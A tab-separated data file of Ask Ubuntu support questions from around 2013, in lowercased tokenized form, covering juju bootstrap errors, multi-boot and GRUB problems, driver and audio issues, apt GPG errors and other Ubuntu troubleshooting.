370990	why is juju unable to connect to environment ?	i can bootstrap but i ca n't see the juju status . error details : no instances found this shows up when i juju -- debug -- show-log and i bootstrap maas but it shows environment is already bootstrap . juju -- devops distilled https : //juju.ubuntu.com/ juju provides easy , intelligent service orchestration on top of environments such as amazon ec2 , hp cloud , openstack , maas , or your own local machine . basic commands : juju init generate boilerplate configuration for juju environments juju bootstrap start up an environment from scratch juju deploy deploy a new service juju add-relation add a relation between two services juju expose expose a service juju help bootstrap more help on e.g . bootstrap command juju help commands list all commands juju help glossary glossary of terms juju help topics list all help topics provider information : juju help azure use on windows azure juju help ec2 use on amazon ec2 juju help hpcloud use on hp cloud juju help local use on this computer juju help openstack use on openstack 2013-11-12 13:28:49 info juju supercommand.go:286 command finished this is debug -v status 2013-11-12 13:33:52 debug juju.provider.maas environprovider.go:33 opening environment `` maas '' . 2013-11-12 13:33:52 debug juju state.go:160 waiting for dns name ( s ) of state server instances [ ] 2013-11-12 13:33:52 debug juju state.go:165 error getting state instances : no instances found 2013-11-12 13:33:52 error juju supercommand.go:282 unable to connect to environment `` '' . please check your credentials or use 'juju bootstrap ' to create a new environment . error details : no instances found
370991	mediatek with ubuntu 12.04 unable to detect the devices connected through usb	i am using ubuntu 12.04 version in hp laptop with mediatek . my pc is not detecting any kind of devices which i connect with the usb . any solution pls
370993	shut down/restart from unity panel menu wo n't work	i 've upgraded to ubuntu 13.10 and now i ca n't seem to shut down or restart my laptop using top right menu on unity panel . when i click shut down or restart nothing happens . i have to press my power button and then on screen menu displays and only then i can restart or shut down . i 'm using hp g62 laptop with intel pentium processor and ati graphics .
370996	why is there a ubuntu+1 immediately after a stable release ?	less than a month ago ( in october 2013 ) , there was a stable release ( saucy ) and now there is one in active development immediately , why is that ? should n't development focus on the stable release or both branch/releases will provide the same amount of fixes ? what will change in the new development release that ca n't be imported from the current stable release ? i 've seen a couple of questions , but they ask how to move from development to stable , not within the scope . i 'd like an answer , like this one will the alpha/beta iso become official after release ?
370997	why my trash icon does n't work in 12.04 lts ?	i click on the trash icon in the launcher , but nothing happens !
370999	install 12.04 from hdd walk through	i have 12.04 saved on my external hdd . it was from a netbook and ran windows xp pro before i dropped it on it 's head . the drive works and i am using it to back up my whatnot . what i ca n't figure out is if it must be installed on the external drive first before i can install it on my laptop and be rid of the curse of windows for ever ! i have also put 12.04 on an 8gig sd chip but it does n't show up in the boot options during startup . i tried to access the ext hdd to run the boot up but it told me some piece was missing.argh !
371003	how can i disable the screen-saver on tablet with ubuntu touch saucy ?	how can i disable screen-saver ubuntu touch saucy on my phone or tablet ( nexus 7 ) ? i do play a internet radio streaming with the mplayer ( from terminal application ) . unfortunately the tablet stop play ( and the screen gets black ) after a while ( 30-60 seconds ) . playback does continue when leave my bath , press the power button ( wake up the system ) and switch back the terminal application to foreground .
371005	ca n't specify window 's class in ccsm 's place windows	following this method , i wanted to `` place '' some of my windows on specific viewports . for instance , i want xchat to always start on my top right viewport ( x=2 , y=1 ) . but after i have set everything up and clicked the `` close '' button to validate it ( i do n't have any other action button , like `` ok '' or `` apply '' ) , the only thing that get saved up are the viewport x and y coordinates . the window class ( in my case class=xchat ) remains empty . this bug only occurs in the `` windows with fixed viewport '' section ; it works well in the `` windows with fixed placement mode '' , for instance . how can i solve or circumvent this issue ?
371006	how can i set defaults look and feel in gnome `` session fall back '' in ubuntu 12.04 for new users ?	i would like to change the behaviour of ubuntu when creating desktop for new users . like background , panel position , avalaible shortcuts to applications and so on . i know that i have to dig into files in /usr/share/glib-2.0/schemas/ and in `` /usr/share/gconf/ '' but my knowledge is somewhat restricted . thanks
371008	dual boot 2 separate ssd drives ?	so right now i only have 1 ssd in my computer . it is 120 gb samsung ssd . i boot windows directly from this ssd . i would like to buy another totally separate ssd and install and boot ubuntu from this one . so 1 pc , 2 drives , and boot windows 7 from 1 , and boot ubuntu from other ssd . is this possible ? any help is appreciated . thanks
371016	access local email stored on worstation on laptop on lan	i have the following scenario with my email : i am using evolution as my primary email client on my workstation . the evolution mail is downloaded from my mail servers using pop , then deleted from the server . when i am mobile , i access my email on my email server using webmail . my laptop is my primary computer thesedays . the workstation is hardly used . when i am mobile , i am restricted to new email that has not been downloaded onto the workstation i am now looking for a way to access my email from my workstation on my laptop , amlost as if my workstation is my second level email server/ i tried evolution on x display but attachments will browse on my workstation ( not ideal as most docs are on my laptop ) . i am open to changing mail client or installing a service on my workstation . what would be the best way to address this requirement ?
371017	livestreaming with twitch on ubuntu 13.04 ?	i am trying to find a live streaming tool for ubuntu 13.04 . i am trying to stream it to twitch . i 've tryed lots of live streaming tools but they do n't work . so my question is , is there a live streaming tool for ubuntu 13.04 with no lag and streams at 720p+ ? twitch : http : //www.twitch.tv/ - this is the website i am trying to stream to .
371018	no wireless connction after updates	no wireless network . i am using hp `` all in one '' with ubuntu 12.04 lts installed . following the last update , my wireless network connection is lost . i have both wired and wireless connection if i boot with older version 3.2.032 , but with new version 3.2.055 i only have wired connection , but no wireless . can anybody help please .
371020	notify-osd notifications appear unthemed in top-left corner	problem i recently upgraded from 13.04 to 13.10 , and suddenly notification bubbles do n't appear themed as usual in the upper right corner , but they appear as white text on blue background in the upper-left corner . it looks like this : unsuccesful attempts to fix it i tried reinstalling unity , notify-osd , ubuntu-desktop removed notification-daemon which was installed , none of that fixes it . in fact running ps aux | grep notify-osd shows that notify-osd is n't even running . but when i try to start it manually by running /usr/lib/x86_64-linux-gnu/notify-osd i get : ** ( notify-osd:4618 ) : warning ** : another instance has already registered org.freedesktop.notifications ** ( notify-osd:4618 ) : warning ** : could not register instance if i understand well , the instance is registered by the /usr/share/dbus-1/services/org.freedesktop.notifications.service file , which right now contains : [ d-bus service ] name=org.freedesktop.notifications exec=/usr/lib/x86_64-linux-gnu/notify-osd renaming or deleting that file ( and rebooting ) has no effect whatsoever ( and it is not recreated automatically ) . this is not a duplicate of no notifications from notify-osd on 13.10 ( and by the way i purged gnome-flashback-session along with notification-daemon ) question ( s ) how can i debug this ? how can i get notifications to come back to normal ? if additional debug information is needed , i 'll be happy to add it ( just that i ca n't find any more ) .
371022	xgettext output to specific folder	i am new using xgettext command . so i do n't know what am i doing wrong . i put the command : xgettext -n *.php -o -- output='/home/public/sample' in my script , but i get an error : xgettext : can not create output file `` -- output=/home/public/sample '' : no such file or directory` but when i run xgettext -n *.php - messages.po file gets created in my current directory ! is there a way to specify the location where to create messages.po file ?
371023	clean install of lubuntu 13.10 : firefox not localized	it seem 's that firefox intalled by default with lubuntu 13.10 is not localized ( in french for my case ) . i performed a clean install ( booting live on usb key , and then installing , using french language , and choosed not to keep anything on hard disk ) i have `` fr '' on systray , and on synaptic , i can see that `` firefox-locale-fr '' is installed ( but `` firefox-locale-en '' is installed too . any clue to get firefox in french ? [ edit ] : suggestion from ark : - remove firefox-locale-en has no effect . - language support is already in french . i changed language order to get french canadian just under french and not at end of list ... nothing changed.. i thing that something is wrong but just with firefox : other default tools are well localized : pidgin , gnumeric , abiworld ... [ edit ] : installig `` local switcher '' plugin : show me only english choice . problem was solved after installing latest updates : firefox was automatically switched in french after reboot , and `` local switcher '' plugin show me more choices : : english us+england+south africa , french
371025	how to load xmir on my tablet/phone with ubuntu touch saucy	on my tablet/phone do not run x11 applications with the default ubuntu touch saucy configuration ( all my favourite desktop applications like okular , kate , x11vnc , etc ... ) . as i found [ here ] [ how to load xmir on ubuntu 13.10 the xmir is required . unfortunately ubuntu touch on phone/tablet do behaves differently and the reply above do not solve this issue . i am testing the xmir on nexus 7 tablet . there is intalled/running unity8 + lightdm + mir and unity-system-compositor + xorg . i am still getting message above after system reboot in the /var/log/xorg.0.log : [ 81.542 ] ( ii ) `` glx '' will be loaded by default . [ 81.542 ] ( ww ) `` xmir '' is not to be loaded by default . skipping . [ 81.542 ] ( ii ) loadmodule : `` dri2 ''
371026	copy `` string '' through command line	can we copy a string with a command-line and have the ability of pasting it with ctrl + v shortcut ?
371027	how do i run a command as root ?	i 've downloaded a driver for a video card ( *.run ) and tried to install within a terminal . when i started the installation process i got this error : error : nvidia-installer must be run as root . i 'm logged in with my own profile .
371031	ubuntu 12.04 network connection unavailable	i recently added a edimax ew-7811un to my computer to allow wireless networking . that was working . now after a reboot i am unable to connect to either wireless or wired network . the result of ifconfig is ifconfig eth0 link encap : ethernet hwaddr bc : ae : c5:46:19:6d inet6 addr : fe80 : :beae : c5ff : fe46:196d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:231 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:62615 ( 62.6 kb ) interrupt:51 base address:0x4000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:664 errors:0 dropped:0 overruns:0 frame:0 tx packets:664 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:52639 ( 52.6 kb ) tx bytes:52639 ( 52.6 kb ) tun0 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:10.8.0.1 p-t-p:10.8.0.2 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
371035	windows 8 not working	i installed ubuntu 13.10 alongside windows and then i restarted my computer . when i get to bootloader the windows 8 icon is not there and it still says install ubuntu . what should i do ? ?
371036	a question about installing ubuntu by vmware	here is a question after i installed the ubuntu by vmware . after i finished the installing process , i found that my ubuntu is just a `` terminal '' without a gui . specs : windows 7 memory : 6g vmware : 7.1.3 build-324285 ubuntu : ubuntu-13.04-desktop-i386 thanks a lot !
371038	how to gain write permissions to a remote windows folder ?	i am running ( l ) ubuntu 12.04 on this machine . i have a windows folder ( windows xp box ) shared on the local network and can view the contents in pcmanfm at smb : //windowsbox/sharename ( as shown in the address bar ) and also at /home/me/.gvfs/sharename , and in terminal at ./home/me/.gvfs/sharename in terminal , i can cp files to ./home/me/.gvfs/sharename but when i try copy/paste in pcmanfm ( drag and drop , etc . ) nothing happens and no error message . of course i could stick to the cli but it 's a bit clunkier .
371039	how to get compiz burn effect ( compiz plugin extra ) in ubuntu 13.10	i used ubuntu 12.04 for few days and liked that compiz closing effect and opening compiz , but the plugin is not loading in ubuntu 13.10 .
371045	external monitor is n't recogized after waking up from sleep ubuntu 13.10 mbp	after upgrading from 12.04 to 13.10 , my external monitor is n't behaving the same . when i close the lid on my macbook pro , with the power cord plugged in , the computer goes to sleep ( it should stay awake and only use external monitor , and should sleep if power cord is unplugged or no external monitor is detected ) . whenever i return from sleep , the external monitor is not detected . i have to unplug it and plug it back in . in ubuntu 12.04 it worked ideally .
371048	how can i define the order of start and stop of linux services ?	example , when i turn on my server , i want to start mysql first then the ntp service .
371049	how are /dev/sda and /dev/sdb chosen ?	i am trying to install windows 7 on /dev/sda but whatever drive i install windows 7 on becomes /deb/sdb . i havent changed any boot priorties in the bios . could someone please help me understand how ubuntu 12.04 chooses /dev/sda and /dev/sdb ?
371050	posting my first application to launchpad and installing it	i created a hello world application in c++ and i would like to post it to launchpad ( on my account ) and then to install it adding the ppa add-apt ... . i have two files in my application folder : a.out main.cpp which are the steps to post my application to launchpad and then to install it on my computer ? now i do in my project folder ./a.out that prints hello world ! . i would like to run hello-world ( as global application/executable ) finally in my terminal and to see hello wolrd ! . how can i do this ?
371056	using boot-repair offline ?	hey guys just a quick quevstion , i have 14.04 installed currently alongside w8 . as usual w8 became the default boot . i 'm trying to get grub to be the default boot . i 've seen lots of recommendations for boot-repair , the problem is i do n't have an internet connection to my system to use for it grab 13.04 repositories . what other options do i have ? i have tried other ways , like manually adding grub but that always ends up with the error that grub ca n't be installed to /boot/grub or something similar . i use 14.04 because it is the only version so far that works out of the box for me .
371057	when turning on touchpad , it turns off and vice versa	when i turn on my pc , my touchpad is not working , because it automatically is turned off by ubuntu.i have a button on my computer , which controls touchpad . when i try to turn off the touchpad , it says that touchpad has been turned on . when i try to turn on touchpad , it says that it has been turned off . so it is mixed . how to get rid of this issue ? i own msi fx600 laptop .
371059	can 100 % root '/ ' usage affect on network speed ? how to safely free space at root ?	i have ubuntu 12.10 server , used mostly as fileserver + router . some times ago it starts behave very strange , for example file transfer from samba server via 1gb/s link becomes very slow ( less than 1mb/s ) after some research and play with network , i found that i have 100 % of my / partition usage . filesystem size used avail use % mounted on /dev/md1 3.1g 3.1g 0 100 % / /dev/sda1 105m 144k 104m 1 % /boot/efi /dev/md2 52g 1.5g 48g 3 % /usr /dev/md4 52g 13g 37g 26 % /home /dev/md5 21g 181m 20g 1 % /tmp /dev/md3 155g 824m 147g 1 % /var /dev/md6 21g 437m 20g 3 % /var/log it 's a problem , and i think to solve it by moving /lib ( 2.3g ) folder to another directory , and mount it at startup . system is installed on software raid0 , so , repartitioning will be very difficult , as i consider . is it like a root of network problems ? what problems will i face if i tried to do smth like rsync /lib folder to /home/root/lib ? can i merge /lib and /home/lib contents and then mount latter to /lib ? p.s . i wonder , how it occured . when i 'm partitioning my disk , i thought , that all programms will be instaled at /home , or at user folders , which i made big enoughtâś where can i read about what partitions are used for what programms ? edited : at site i found : '' the directories /bin , /lib , and /etc should never be separate partitions ! at boot time , only / is mounted initially . the init program needs to access files in /etc and the bootup scripts need access to commands in /bin , which may depend on files in /lib . kernel modules required to complete the boot process are also kept in /lib. '' so , i ca n't move /lib to another partition . can i clear it or smth else ? /lib/modules contains : 3.5.0-17-generic 3.5.0-26-generic 3.5.0-30-generic 3.5.0-34-generic 3.5.0-40-generic 3.5.0-23-generic 3.5.0-27-generic 3.5.0-31-generic 3.5.0-37-generic 3.5.0-41-generic 3.5.0-25-generic 3.5.0-28-generic 3.5.0-32-generic 3.5.0-39-generic 3.5.0-42-generic do i need all this files ?
371061	disappearing data	so here is a problem . my gf have asus s46c with pre-installed windows 8 . she has wanted to have ubuntu 12.04 so she sent laptop to some guy whom i do n't know . he installed ubuntu next to windows and everything works fine , but when i trying to transfer data into data or os disk , data seem to be copied . unfortunately , when we shut down computer and turn it on again , files disappearing . we ca n't find files either on windows and ubuntu . so i have 2 question : 1 ) can i recover data which i have lost ? 2 ) what should i do to normally transfer data ?
371063	lamp server with multiple php versions	i am looking for a way to install multiple versions of php on my notebook to work on different projects that require different versions of php . i have ubuntu 13.10 and installed apache2 , php5 , mysql etc from the repository . i have now php 5.5 installed , and i would like to have also php 5.3 for some projects that do n't work well with php 5.5 . so i need a way to have multiple versions of php installed on my system and switch between them depending on the project i 'm working on , or better configure the vhost to use the chosen version .
371065	lightnin calendar	so my latest updates to ubuntu 13.04 seems to have pooched my lightnin calendar in thunderbird ( or at least something has ) . the calendar tab appeared but nothing was there . so i tried a couple of attempts to re-installed lightnin but nothing worked , and was without the calendar tab altogether . so i upgraded thunderbird to 24.1.0 and lightnin to 2.6.2 . the calendar option is now in the thunderbird view menu but disabled . any ideas on how to get the calendar back ?
371066	creating new partition on windows and now have problem on grub and not booting	i have a sony vaio laptop that has original windows 7 . i installed a linux inside a windows . ( i had a system with windows and a linux ) . i create a new partition on my computer of windows . but after restart system not booting and there is an this message on screen : gnu grub version 0.97-71.fc15 ( 634k lower /3651056k upper memory minimal bash-like line editing is supported for the first word , tab lists possible command completions anywhere else tab lists the possible completions of a device /filename . ) now i can mount windows file by use of live ubuntu cd but ca n't mount my linux partitions : ( how can i fix this problem ?
371068	trying to install click modular router and need /usr/src/linux to install as kernel module	i 'm trying to install click modular router as a linux kernel module . i ran the command sudo ./configure -- enable-linuxmodule and i got the following error ca n't find /usr/src/linux , so i ca n't compile the linuxmodule driver ! ( you may need the -- with-linux=dir option . ) i then ran the following command sudo ./configure -- enable-linuxmodule -- with-linux=/usr/src/linux-headers-3.2.0-55-generic-pae and i got the following error ca n't find linux system.map file in /usr/src/linux-headers-3.2.0-55-generic-pae . ( you may need the -- with-linux=dir and/or -- with-linux-map=map options . ) i need to set this up in such a way that i can put this in an automated deployment script . how would i go about doing this ?
371070	why i ca n't install from ubuntu software center	hy , please why i ca n't install software from ubuntu software center ? no install button !
371071	problem with heat of i3 processor and battery life on ubuntu 13.04	i got problem with i3 processor on 13.04 ubuntu version . i read somewhere that linux ( ububntu ) can overclock the processor to higher values . i dunno if is this true but i guess it is . on windows the air what was coming from cooler for processor was absolutly cold , otherwise on ubuntu is on boot bit warm and now actually when i start using it the air becomes very hot . at second the battery life on windows was about 6 hours but on ubuntu is it only approximately 3 hours . i think this is connected with processor performance . can somebody help me to change/solve this ?
371072	cinnamon crashes with non-default menu	as i 'm sure the title suggests , i 'm having trouble with the menu cinnamon uses to launch programs . first off , i do n't normally use the default menu , as it takes up more space on my computer 's tiny , low-res screen then i have room for ( in other words , i ca n't see the top of the menu ! ) . so , i installed a windows 7-like menu . however , as of recent months , cinnamon instantly crashes whenever i use any menu other than the default . i 've tried reinstalling my prefered menu , but that did n't help . i 've also changed the permissions on said menu 's files ( ~/.local/share/cinnamon/applets/cinnamon7menu @ physics ) to allow any user to access them , no dice . i even tried removing the menu completely , and reinstalling it from scratch . reinstalling cinnamon itself ( and nemo ) was also unhelpful . also , another issue i 'm having is that i can not get the usual trio of options that appear when you right-click a program inside the menu : add to panel , add to desktop , and add to favorites . this issue is n't a big deal ( since the menu items can be dragged and dropped ) but i think it may be related to the above issue . ps : i do n't see any `` menu '' options inside cinnamon-settings on this particular computer . my other two ubuntu+cinnamon machines show this exact same option . i 'm at a loss . i installed cinnamon from the ppa : gwendal-lebihan-dev/cinnamon-stable ppa . i 'm running ubuntu 13.10 , i386 .
371073	internal mic not recognized and not working ( hp pavilon dv5-1022 )	i have a laptop hp and i have installed ubuntu 13.10 gnome ( previously ubuntu 13.04 gnome ) , my internal microphone is not recognized and not working . my alsa information file : http : //www.alsa-project.org/db/ ? f=02464336849e442b5541cafc01f66a42ffd19c2f some screenshots : sound control ( internal mic not recognized here ) alsamixer pavucontrol input devices pavucontrol configuration my /etc/modprobe.d/alsa-base.conf http : //pastebin.com/4xchjvx7 any ideas ? thank you so much : )
371077	twitter online accounts , is authorized and then it needs to be authorized again	i have twitter added to my online accounts and about once a day it needs to be granted access , is there any way to keep it granted always .
371078	problems with ubuntu 12.04 install on windows 7 image	for work many of our programmers are using ubuntu 12.04 for their systems . all of our computers however are required to run windoze 7 for our encryptions software . when installing ubuntu 12.04 on this image for some reason grub2 is not installing correctly and after the install the computer goes straight into windows . i have been able to successfully repair grub by running boot-repair on a live disk but this solution is not suitable for doing on every machine that we build . can anyone tell what may be causing grub to not install correctly ? i have tried creating a new image , partitioning the drive manually , partitioning the drive with the installer , downloading older versions of 12.04 nothing seems to change the behavior after install . since this is an image it is being installed on multiple types of systems . the 2 that i have tried recently are both dells . one was a m6700 and the other is an e6530 . boot repair documentation https : //help.ubuntu.com/community/boot-repair thanks
371079	asus vivobook s400ca -ubuntu 13.10 mic not working	i am dual booting ubuntu 13.10 with windows 8.1 . mic works ok in windows . it is not working in ubuntu . lspci shows 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) subsystem : asustek computer inc. device 10fd flags : bus master , fast devsel , latency 0 , irq 46 memory at f7e18000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel i have gone through various solutions like unlocking stereo and making volume 0 to one channel ; trying dkms pkgs and echo `` autospawn = no '' > ~/.pulse/client.conf killall pulseaudio oem-audio dkms pks not getting installed . other solutions also did not work . please suggest any solutions ?
371080	dim light problem	i have a dell laptop , which is can dim the light of the screen , by keyboard , but when i turn to dim the light , the system freeze and does not respond for any thing , could you help me ? ?
371085	how to assign unique mac addresses to sub-interfaces	i 'm in a corporate environment with a dhcp server with static assignments for my server . i have one physical nic with several sub-interfaces . i statically assign different mac addresses for each sub-interface to get another ip address from the dhcp server . for some reason , my server is not taking the static mac addresses . you 'll notice that ifconfig shows each interface with the same mac . how do i assign unique mac addresses to my sub-interfaces ? $ cat interfaces auto lo iface lo inet loopback auto eth0:1 iface eth0:1 inet dhcp hwaddress ether 00:0c:29:31:24 : fa hostname gwrt-test client gwrt-test auto eth0:2 iface eth0:2 inet dhcp hwaddress ether 00:0c:29:31:25 : fa hostname gwrt-test2 client gwrt-test2 $ ifconfig eth0 link encap : ethernet hwaddr 00:0c:29:31:25 : fa up broadcast running multicast mtu:1500 metric:1 rx packets:329737 errors:0 dropped:0 overruns:0 frame:0 tx packets:121645 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:69228791 ( 69.2 mb ) tx bytes:63531749 ( 63.5 mb ) interrupt:16 eth0:1 link encap : ethernet hwaddr 00:0c:29:31:25 : fa < - should be 24 : fa inet addr:10.203.102.29 bcast:10.203.102.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 interrupt:16 eth0:2 link encap : ethernet hwaddr 00:0c:29:31:25 : fa inet addr:10.203.102.32 bcast:10.203.102.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 interrupt:16
371086	strange gpg error . apt-get does n't work anymore	if i run anything apt-get related , i get this error : w : gpg error : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey d6b6db186a68f637 please how can i fix this ? thanks in advance .
371090	archive manager that extracts into new folder named after archive	file-roller , xarchive , 7zip ( with a tedious workaround ) have the following workflow : extract the files in the folder containing myarchive without creating a folder myarchive and extracting into there . peazip , winrar have the option to extract archive into a new folder named with the archive name . peazip is out of the question becuase it does not support implicit tar.gz archives . is there an archive manager that support gz , tar , bz , rar and zip that integrates with the pcmanfm context menu that can extract into a new folder as specified ?
371094	ubuntu 13.04 encrypted hard drive issues	ok , so i had ubuntu 13.04 with an encrypted harddrive option installed on my laptop . i accidentally deleted important grub data trying to make more room in the boot folder i think ? so the computer would no longer boot up . anyways , i installed a second ubuntu 13.04 in a different partition on the same laptop , but i am unable to access all of my important information that is still on the encrypted partition . when i go to mount it to access everything , it asks for the encryption password ... however , it tells me the password is incorrect , which i know 100 % that it is the correct password . someone please help me ! inform me how i can access this encrypted partition or restore the data in the boot menu/grub so that i can boot the laptop up under the encrypted version to get access to all my important saved files .
371096	blueman causes nautilus-sendto to crash !	after installing blueman , the `` send to '' option in nautilus does n't work anymore , nothing happens when you click on it . output of nautilus-sendto random file : init pidgin plugin init evolution plugin init nautilus burn plugin /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : specified class size for type 'pygtkgenericcellrenderer ' is smaller than the parent type 's 'gtkcellrenderer ' class size from gtk import _gtk /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : g_type_get_qdata : assertion 'node ! = null ' failed from gtk import _gtk segmentation fault removing blueman fixes the problem , but i need blueman in order for my bluetooth to work . it says here that a fix was released in version 1.23 but i'am already running 1.23 ! !
371099	dell mini 10 : poor audio streaming	i 'm a newbie , so please be gentle . and apologies in advance if this question has been asked before . i have just installed ubuntu 12.04 lts onto my dell mini 10 and , in general , am very happy with it . i understand that this particular model does have a number of compatability issues due to the oem hardware installed , and the one i am experiencing is as follows : the audio output breaks-up whenever trying to play a movie or youtube file . the video part of the package is about as good as i can expect , but the audio is terrible , jumping frames left , right and centre . i have installed the vlc media player and the minitube player which are no better . is there a work-around , or fix . i 'm not a complete novice , though neither am i a hardcore programmer . i really do n't wo n't to go back to windows ... thanks in advance .
371101	gnome 3 loses focus after closing all open windows	i 'm on ubuntu 12.04 , which i have had for a long time . on this computer i 've installed both xfce4 and gnome 3 , and i 'm currently using gnome 3 fallback . recently i 've been having a weird problem . when i close all open windows in a given workspace ( be it with mouse , alt-f4 or other key-combinations ) , everything loses focus and the keyboard does n't work anymore . i need to click anywhere on the desktop for these things to start working again . what can i do to fix this problem ?
371103	chrome 30 completely broken in ubuntu 13.10	i just installed chrome from the deb file ( 64 bit ) and it is completely broken ! almost every page gives basic javascript errors , the window freezes every few minutes , there are lots of visual glitches when reordering tabs , and in most pages the page name does not appear in the tab . any ideas why is that ?
371104	efidisk read error	i am really desperate now . i had to reinstall my system on friday . instead of ubuntu 12.04 with unity i chose kubuntu 12.04 . installation was smooth but with booting i got efidisk read error . system worked so i thought i can ignore the whole thing . on saturday the system did n't boot up . i thought maybe i screwed up during installation so i reinstalled the system again . i got the same efidisk error on startup and on sunday the system did n't start anymore again ( only the grey screen showed up ) . i then figured out , that when i have the installation usb-drive connected the system starts . i googled and found an article that stated that installing from cd could solve the problem . guess what , i reinstalled the system again and again i get the efidisk read error . does anyone know what i have to do ? with the old installation ( ubuntu 12.04 ) i did n't have any problem . edit : since it is not working with kubuntu 12.04 i installed 13.10 and i can start without a problem . evern 13.10 is buggy , right now i am happy
371107	multi-boot with windowsxp , windows7 and ubuntu . boot problems	what i 've been trying to do is partition my 600gb harddrive 4 ways and install three os . partition 1 , 16gb : windowsxp x32 partition 2 , 16gb : ubuntu 12.04 partition 3 , 30gb : windows7 x64 and finally the last partition with the rest of my space for storage . however , i have reformatted and reinstalled all these os maybe 5 times yesterday trying to figure out how i would do it . after the first two installs , i realized i had to install the os in a specific order . the next few installs where faults in how i was splitting the partitions . the last time i did it last night , it appeared as though i installed it all right , as grub would boot up , from there i could hit windows then the windows loader would appear with 'older windows ' and windows7 as options . so i went to bed satisfied without actually checking it . now , woke up , tried to boot windows7 ... it appeared that the windows7 partition magically disappeared . anyway , i just installed everything 'again ' , with this setup ; split all the partitions and make them all 'primary ' , install windowsxp install windows7 test to make sure windows7 and xp both boot up . since they did , install ubuntu from a live cd . grub did n't pop up automatically at this point . boot still loaded windows loader . so i used the live cd to run boot-repair . boot-repair worked without any errors , so i restart grub does n't appear , but ubuntu loads automatically . i was also holding left-shift though the boot process just in case . at this point , i 'm not sure what to do to make grub appear . so i look online and find out there is a config file you can 'commit ' a line out of for the 'grub timeout ' or something , so i do that . grub still does n't 'launch ' . go back into ubuntu , go to install boot-repair , but it gives this error in the terminal ; 'installing refind on linux ... . //boot/efi does n't seem to be on a vfat filesystem . the esp must be mounted at //boot or //boot/efi and it must be vfat ! aborting ! dpkg : error processing refind ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up gawk ( 1:3.1.8+dfsg-0.1ubuntu1 ) ... setting up glade2script ( 3.2.2~ppa45~precise ) ... setting up boot-sav ( 3.199~ppa33~precise ) ... setting up boot-repair ( 3.199~ppa33~precise ) ... setting up boot-sav-extra ( 3.199~ppa33~precise ) ... setting up python-configobj ( 4.7.2+ds-3build1 ) ... setting up pastebinit ( 1.3-2ubuntu2.1 ) ... errors were encountered while processing : refind e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ' so , i 've been having alot of harsh luck with multi-booting so far . is there any way to fix the above error without having to reformat 'everything ' again , while at the same time make grub show and windows options for loading ? i 'm convinced i 'm doing something wrong , but i 'm not sure what . and , it it matters at all , i apparently have something called a 'uefi ' bios or something ? i have no idea what that means , but it seems to have come up quite a bit in all my googling , so maybe that 's the cause of all my suffering ? thanks in advance for reading all this , but yeah ... halp ?
371114	safe to remove entries in 12.04 sources.list ?	recently , every time i have run sudo apt-get update with 12.04 precise there have been two 404 's ( note : i do n't have the rep to post more than 2 links , so i 've removed the 'http : // ' from the urls below for the sake of the question ) : err archive.ubuntu.com hardy/universe sources 404 not found [ ip : 91.189.92.202 80 ] err archive.ubuntu.com hardy/universe i386 packages 404 not found [ ip : 91.189.92.202 80 ] when i run the update manager gui , it always notified me that my last check was stale by x number of days ( at the time of writing , the last check was stale by 57 days . so i commented out the last two entries in my /etc/apt/sources.list , which are : # # for legacy gcc deb archive.ubuntu.com/ubuntu/ hardy universe deb-src archive.ubuntu.com/ubuntu/ hardy universe ... and the updates run without any problems now ( although there was n't really any noticeable negative effects before-hand , just that the errors were concerning me . the red exclamation in the toolbar and associated error message were concerning me too ) . so my question is , am i missing out on something important and should i be replacing those hardy urls i commented out with something else ?
371119	how do i see the dns hint file ( root name servers ) ?	according to wikipedia 's article on the address resolution mechanism of dns there should be a `` hint file '' in my os somewhere , containing ip addresses of a few `` root name servers '' . how do i see this hint file on ubuntu ?
371125	keyboard layout changes in ubuntu 13.10	i use a norwegian keyboard layout in ubuntu . i did a clean install on my asus k52f . every time i turn on the laptop , the layout is set to english ( or some other language , i ca n't really tell ) . the same thing happens whenever the laptop goes into screensaver mode and i try to log in with my password when prompted . i 've searched the forums and askubuntu , but i have n't found a solution to this problem . any ideas how to fix this ?
371128	nvidia card nouveau gpu lockup	i have just recently installed ubuntu with the wubi installer alongside windows . however , when i try to start ubuntu 's firefox , it will crash and give me the gpu lockup-switching to software fbcom error , after which there will be several switching channel errors . this also happens when i try to load what i guess to be some more graphically heavy portions of the gui , such as system preferences and backup . since i can look at ubuntu through windows as it is installed through wubi , is it possible to 'implant ' the necessary proprietary drivers into ubuntu while i am in windows ?
371132	qt creator does not work correctly after installing ubuntu sdk	i installed qt-sdk before installing ubuntu-sdk on ubuntu 12.04 . when the develop , examples , or tutorials link on the welcome page is clicked it creates inactive windows and can not close it normally . also the help contents are overlapped with images and so it is very difficult to read . any solutions ?
371134	glade is crashing in ubuntu 13.10 when i load a file done in ubuntu 12.04	i made this file in ubuntu 12.04 and all is working perfect with glade : http : //bazaar.launchpad.net/~costales/gui-ufw/gufw-13.10/view/227/data/ui/preferences.ui but in ubuntu 13.10 and glade 3.14.2 , when i 'm opening that file , i get this dump : ( glade:2626 ) : gladeui-error ** : unable to get gladewidget for internal child vbox it 's the line : < child internal-child= '' vbox '' > please , how can i fix this ? thanks in advance !
